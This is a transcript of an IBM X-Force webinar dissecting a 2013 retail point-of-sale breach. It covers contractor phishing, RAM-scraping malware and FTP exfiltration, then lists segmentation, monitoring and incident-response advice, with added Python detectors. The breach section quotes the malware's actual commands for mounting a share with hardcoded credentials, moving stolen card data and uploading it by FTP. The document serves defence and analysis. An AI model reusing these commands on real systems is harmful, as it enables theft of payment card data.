Anatomy of an Advanced Retail Breach
Post on 14-Sep-2014
DESCRIPTION
The personal and financial information of approximately 110 million Americans, comprising 11 GB of data, was stolen in a successful compromise of a retail giant during the 2013 Christmas shopping season. Equally concerning is that the attackers persisted – undetected – for as long as two weeks before the breach was discovered. What can retailers and other enterprises learn from this event? Join IBM Security experts on Wednesday, February 19th where we will share details on the anatomy of this breach and recommended steps to protect you against similar attacks. View the full on-demand webcast: https://www2.gotomeeting.com/register/537536362
TRANSCRIPT
© 2012 IBM Corporation
IBM Security Systems
© 2014 IBM Corporation
Anatomy of an Advanced Retail Breach
Chris Poulin, Research Strategist, X-Force
February 2014
Agenda
About the IBM X-Force
Dissection of a retail attack and data breach
Solutions to prevent similar compromises
Note: Information provided by IBM in this webinar and the associated blog entry is derived from research by the author and/or the IBM X-Force, and is based on publicly available sources. No information was obtained by, or otherwise derived from, any confidential information shared with IBM.
X-Force is the foundation for advanced security and threat research across the IBM Security Framework
The mission of X-Force is to:
Monitor and evaluate the rapidly changing threat landscape
Research new attack techniques and develop protection for tomorrow’s security challenges
Educate our customers and the general public
Collaborative IBM teams monitor and analyze the changing threat landscape
Coverage
20,000+ devices under contract
3,700+ managed clients worldwide
15B+ events managed per day
133 monitored countries (MSS)
1,000+ security related patents
Depth
17B analyzed web pages & images
40M spam & phishing attacks
73K documented vulnerabilities
Billions of intrusion attempts daily
Millions of unique malware samples
Anatomy of the Breach
(Diagram: contractor portals, retailer POS systems and retailer Windows file server on the internal network behind a firewall; attacker FTP servers external, in Russia)
1. Attacker phishes a 3rd party contractor
2. Attacker uses stolen credentials to access contractor portals
3a. Attacker finds & infects internal Windows file server
3b. Attacker finds & infects POS systems w/malware
4. Malware scrapes RAM for clear text CC stripe data
5. Malware sends CC data to internal server; sends custom ping to notify
6. Stolen data is exfiltrated to FTP servers
1. Phish a 3rd Party Contractor
HVAC firm in PA
Email malware campaign
Citadel password stealing bot, variant of Zeus banking trojan
Primary method of malware detection: free version of Malwarebytes Anti-Malware
On-demand scanning; not for commercial use
Supplier portal contains lots of public information
– Example: list of resources for HVAC companies
2. Access & exploit contractor portal
pdzone.retailer.com, 61.225.130.104, NS @ retailer.com
amlogin.ewips.partnersonline.com
161.225.202.98, NS @ retailer.com
Contractors generally not required to use token or other 2-factor authentication
service.ariba.com
216.109.104.11
NS @ ariba.com
3a. Discover & exploit internal file server
Exact method of movement from portal to internal server unknown
Probably not HVAC partner—cloud-based, not on retailer extranet
Back-end connect from partner portal or other retailer owned asset?
SQL injection, browser exploit, open ingress port, who knows?
Or maybe contractors had access to internal network to monitor HVAC systems remotely
3a. Discover & exploit internal file server (cont’d)
Intel from contractor portal? Lots of resources; example: Excel spreadsheets with useful metadata
– Created by username John.Doe
– Printed recently on Windows \\DOMAIN\
Google search easily reveals location of retail datacenters:
Malware to accumulate stolen card data and exfiltrate regularly (may have been 2 separate servers)
– Username=“Best1_user”; password=“BackupU$r”
– Same username is installed with BMC Software Performance Assurance for Microsoft Server; password is not generated by BMC
– Installed as “BladeLogic”, hiding as BMC component, BladeLogic Automation Suite; however, BMC doesn’t name any component “bladelogic.exe”
– System / Administrator level account; can run batch jobs
3b. Find & infect POS systems
With a point of presence on an internal server, it’s all unicorns and rainbows from here. Evil unicorns
Image source: http://bigsnarf.wordpress.com/2013/03/10/using-mapreduce-for-fraud-detection-and-prevention/
4. Malware scrapes card data from RAM
Trojan.POSRAM, variant of BlackPOS
No anti-virus solution had a signature for the malware at the time of the attack, or at the time of disclosure
Looks for “pos.exe” process
Installs trojan, creates registry entries containing string “POSWDS”
Scrapes RAM for track 1 and track 2 data of financial cards
Card track data is encrypted
– Between the reader and POS, and
– again between the POS and payment processor
Unencrypted momentarily at the POS as the transaction is cleared
Debit card PINs are hashed at the card reader
Chip-and-PIN encrypts the transaction from the card to processor
Stores stolen card data in file %SystemRoot%\system32\winxml.dll
5. Harvested card data is sent to internal rally point
Moves stolen card data to a central collection point
Assumes POS systems have no internet access
Creates temp Windows share on domain
Malware on rally point creates share in %windir%\twain_32
Encodes base64, with encoding string
JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau
Moves winxml.dll to \\<RallyPoint>_<Day>_<Mon>_<Hr>.txt
POS malware sends custom ICMP to as semaphore
net use S: \\<HardCodedIP>\c$\WINDOWS\twain_32 /user:Best1_user BackupU$r
move %windir%\system32\winxml.dll S:\<InfectedMachineName>_<Day>_<Month>_<Hour>.txt
net use S: /del
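To support impact analysis on dump files recovered from the rally point share, an added example (not from the webinar or from IBM) that decodes the custom-alphabet base64 described above. It assumes the quoted string is used as a straight replacement for the standard base64 alphabet, in order, with the usual '=' padding; the page does not confirm that detail.

```python
import base64

# Alphabet quoted on the slide. Assumption (not stated on the page): it is a
# drop-in replacement for the standard base64 alphabet, in the same order.
CUSTOM_ALPHABET = "JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau"
STANDARD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# A usable replacement alphabet must be a permutation of the standard one;
# the quoted string passes (64 distinct characters, same character set).
assert sorted(CUSTOM_ALPHABET) == sorted(STANDARD_ALPHABET)

_TO_STANDARD = str.maketrans(CUSTOM_ALPHABET, STANDARD_ALPHABET)


def decode_rally_point_dump(blob: str) -> bytes:
    """Map a custom-alphabet base64 string back onto the standard alphabet and
    decode it. Surrounding whitespace is ignored and missing '=' padding is
    restored, so a recovered file can be fed in as read from disk."""
    standard = blob.strip().translate(_TO_STANDARD)
    standard += "=" * (-len(standard) % 4)
    # validate=True rejects characters outside the alphabet instead of skipping
    # them silently, which would hide a file that is not in this encoding at all
    return base64.b64decode(standard, validate=True)
```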
6. Card data is exfiltrated to FTP servers in Russia
Compiles all card dumps into c:\windows\twain_32a.dll
Exfiltrates data via FTP to <PublicFTPServer>/public_html/cgi-bin
Generates an FTP script and executes ftp -s <path>\\cmd.txt
Protect endpoints
The ultimate prize:
– POS systems: where the card data is processed
– File servers: base of operations
– Web servers: initial incursion vector
– Contractor workstations: intelligence, credentials
Malware protection:
– Contractor workstations (phishing, Citadel bot)
– POS systems: RAM scraper trojan
– File servers: data management and exfiltration tools
– Application isolation (Intel SGX; micro-virtualization, etc) to prevent RAM scraping
Patch
Configuration management
Protection against web and file server compromises
Secure development lifecycle (SDLC)
– Secure coding practices training
– Static/source code analysis—manual (code review) and automated
– Dynamic code analysis (esp low hanging fruit: SQL injection & XSS)
– Include compiled application, web applications, mobile apps
Go-live security process
– Harden system (reduce footprint/services, suppress excess information, harden apps, change usernames / passwords)
– Install appropriate endpoint protection and configuration management
– Vulnerability scan
Appropriate authentication
– Separate domains / administrative credentials (identity separation)
– Multi-factor authentication
Segment critical assets
Enumerate & classify
Restrict web assets’ access to internal systems
Isolate public / partner facing assets from private assets
Segment operational technology (OT), critical assets, and general IT
Perform firewall rule analysis, paying special attention to:
– assets containing sensitive data, such as cardholder information
– risky protocols and flow directions
For example, POS systems shouldn’t
– mount Windows shares, or
– send regular ICMP packets
Image source: http://nationalgeographic.com
Monitor & detect: network
Network activity pattern monitoring can detect:
– Suspicious scanning activity as attacker maps out the network landscape
– Policy violations for outbound FTP, especially to Eastern Bloc countries
Network packet inspection can detect:
– IPS can stop SQL injection, XSS, other more advanced attacks
– Credit card number patterns in outbound data
– Suspect strings in ICMP packets
– Identify network traffic that is not what it seems: e.g.,
• Non-DNS protocol over port 53
• IRC over port 80
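As an added example (not part of the IBM material) of the “credit card number patterns in outbound data” check, the following scans a captured payload for track-2 records and for bare PANs that pass the Luhn check, which filters out order numbers and timestamps that merely look like card numbers. The sample payload, the /cgi-bin/up.php path and the 4111 1111 1111 1111 test PAN are constructed.

```python
import re

# Track 2 as written on a magnetic stripe: ';' PAN '=' YYMM service-code discretionary '?'
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})\d*\?")
# Bare PAN candidate: 13-19 digits, optionally separated by single spaces or dashes,
# and not embedded in a longer digit run
PAN_RE = re.compile(rb"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check on a string of decimal digits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                      # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_card_data(payload: bytes) -> list[dict]:
    """One finding per track-2 record or Luhn-valid PAN in an outbound payload.
    Only the last four digits are kept, so the alert itself carries no cardholder data."""
    findings, covered = [], []
    for m in TRACK2_RE.finditer(payload):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            findings.append({"kind": "track2", "last4": pan[-4:], "expiry": m.group(2).decode()})
            covered.append(m.span())
    for m in PAN_RE.finditer(payload):
        start, end = m.span()
        if any(s <= start and end <= e for s, e in covered):
            continue                        # already reported as part of a track-2 record
        pan = re.sub(rb"[ -]", b"", m.group(0)).decode()
        if luhn_ok(pan):
            findings.append({"kind": "pan", "last4": pan[-4:]})
    return findings


# Constructed sample of an outbound request body (hypothetical upload path)
SAMPLE_PAYLOAD = (
    b"POST /cgi-bin/up.php HTTP/1.1\r\n\r\n"
    b";4111111111111111=25121011234567890?\r\n"
    b"order 4111 1111 1111 1111 total 12.34\r\n"
    b"ticket 1234567890123 ref 9876543210\r\n"   # 13 digits but fails Luhn: not reported
)

if __name__ == "__main__":
    for finding in find_card_data(SAMPLE_PAYLOAD):
        print(finding)
```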
Monitor & detect: vulnerability and anomaly detection
Vulnerability scanning, including deep endpoint assessment
– example: registry entries containing “POSWDS”
Anomaly detection
– Profile behavior of critical assets, e.g., POS and HVAC systems (if remote access)
– Detect deviations from baseline:
• POS connecting to Windows shares
• POS emitting ICMP packets
– General anomalous behavior or change in network pattern: ICMP, SMB/CIFS, FTP
– Profile ICMP packet sizes, normal payload contents; identify & block deviations
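One way to express the segmentation rules from the “Segment critical assets” slide (POS must not mount shares or send ICMP; no outbound FTP) together with the baseline checks above, as a scan over flow records. This is an added example, not IBM code; the asset inventory, the flow log format, the ICMP payload-size baseline and the 203.0.113.45 drop-server address are constructed assumptions.

```python
from dataclasses import dataclass
import ipaddress

# Constructed asset inventory, assumed to come from the "enumerate & classify" step
ROLES = {"10.10.1.21": "pos", "10.10.1.22": "pos",
         "10.10.5.10": "fileserver", "10.10.7.7": "workstation"}
INTERNAL = ipaddress.ip_network("10.0.0.0/8")
SMB_PORTS = {139, 445}
ICMP_BASELINE_BYTES = {32, 56}  # assumed normal echo payload sizes learned from the baseline


@dataclass
class Flow:
    ts: str
    src: str
    dst: str
    proto: str
    dport: int
    nbytes: int


def parse_flow(line: str) -> Flow:
    """Parse one constructed record: 'ts src dst proto dport bytes' (dport 0 for ICMP)."""
    ts, src, dst, proto, dport, nbytes = line.split()
    return Flow(ts, src, dst, proto.lower(), int(dport), int(nbytes))


def check_flow(f: Flow) -> list[str]:
    """Apply the segmentation policy and the behavioural baseline to one flow."""
    alerts = []
    role = ROLES.get(f.src, "unknown")
    external = ipaddress.ip_address(f.dst) not in INTERNAL
    if role == "pos" and f.proto == "tcp" and f.dport in SMB_PORTS:
        alerts.append("POS mounting a Windows share")
    if role == "pos" and f.proto == "icmp":
        alerts.append("POS emitting ICMP")
    if f.proto == "icmp" and f.nbytes not in ICMP_BASELINE_BYTES:
        alerts.append("ICMP payload size off baseline")
    if f.proto == "tcp" and f.dport == 21 and external:
        alerts.append("outbound FTP to an external host")
    return alerts


def scan(log: str) -> list[tuple[str, str]]:
    """Return (source host, alert) pairs for every flow that violates policy or baseline."""
    return [(f.src, a) for f in map(parse_flow, log.splitlines()) for a in check_flow(f)]


# Constructed flow records; 203.0.113.45 is a documentation-range address
SAMPLE_FLOWS = """\
2013-12-02T03:14:07 10.10.1.21 10.10.5.10 tcp 445 18211
2013-12-02T03:14:09 10.10.1.21 10.10.5.10 icmp 0 1200
2013-12-02T03:15:00 10.10.7.7 10.10.5.10 tcp 445 2048
2013-12-02T03:20:00 10.10.5.10 203.0.113.45 tcp 21 11534336
2013-12-02T03:21:00 10.10.7.7 10.10.5.10 icmp 0 32
"""
```

The workstation's share access and its 32-byte ping produce nothing; the two POS flows and the file server's outbound FTP are the four alerts a SOC would want.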
Incident Response
Speedy and complete forensics
– early in the process if the compromise is detected before data is stolen, or
– after a severe breach when accurate impact analysis is critical:
• Which systems were compromised?
• How many customers were affected?
• How much of the data comprised personal information?
Instrument everything feasible
– include POS systems and network activity
– Enrich with context from
• vulnerability assessment tools
• change management transactions
• security intelligence feeds.
Incident / emergency response
Plan should include
– Detection
– Response and escalation
– Engaging law enforcement as appropriate
– Preservation of evidence
– Compliance with regulations and contractual agreements
– Customer and press notification
– Public relations.
Engage your contracted external emergency response agency in advance
– Help you prepare for a breach and
– Gather context about your environment.
Test your process regularly
Business associate contract and assessment
At IBM, the world is our security lab
6,000 IBM researchers, developers, and subject matter experts, ALL focused on security
More than 3,000 IBM security patents
Security Operations Centers
Security Research and Development Labs
Institute for Advanced Security Branches
Get Engaged with IBM X-Force Research and Development
Follow us at @ibmsecurity and @ibmxforce
Subscribe to X-Force alerts at iss.net/rss.php or the IBM Security blog at www.securityintelligence.com
Download X-Force security trend & risk reports: http://www.ibm.com/security/xforce/
www.ibm.com/security
© Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.
Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.